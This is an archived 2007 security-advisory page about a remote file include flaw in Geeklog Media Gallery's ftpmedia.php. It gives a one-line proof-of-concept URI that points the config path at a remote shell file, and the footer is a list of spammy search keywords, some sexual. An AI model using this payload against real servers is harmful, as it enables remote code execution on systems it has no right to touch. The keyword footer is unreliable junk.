about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability


Title Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
Published 2007-05-14-12:00AM
Updated 2007-05-16-04:28PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ThE TiGeR is credited with the discovery of this vulnerability.
Vulnerable  Geeklog Media Gallery 1.4.7
Geeklog Media Gallery 1.4.6
Geeklog Media Gallery 1.4.5
Geeklog Media Gallery 1.4.4
Geeklog Media Gallery 1.4.3
Geeklog Media Gallery 1.4.2
Geeklog Media Gallery 1.4.1
Geeklog Media Gallery 1.4.8a
Geeklog Media Gallery 1.4
Not Vulnerable  Geeklog Media Gallery 1.4.8b
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://example.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 10 Jan 2009 02:06:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
(I-864) cameroon 1.3.23 Crack Data ebony sex www.PORNO. GIRLS SEX Xxx.Sexy Www.katrin sexlk news for c Thmel news for c Bigblackdi jkwyd.cn six amerik jomed news searc www.jkwyd. kajolsexvi %3D %21sca See you... Crack Data Www.xxx89. ramyakrish INDIAN SEX news for c Sexi video high schoo maximus Styx mambo Remo ejay hip h xvideos.co rsgallery. www.myspaa Tamilsex.C news for c Moobos com WWW.INDIAN adduser.cg CMS is Fre Poppassd youtubecin modules/sa nude photo proftpd 1. news for c mambo Remo sexy gay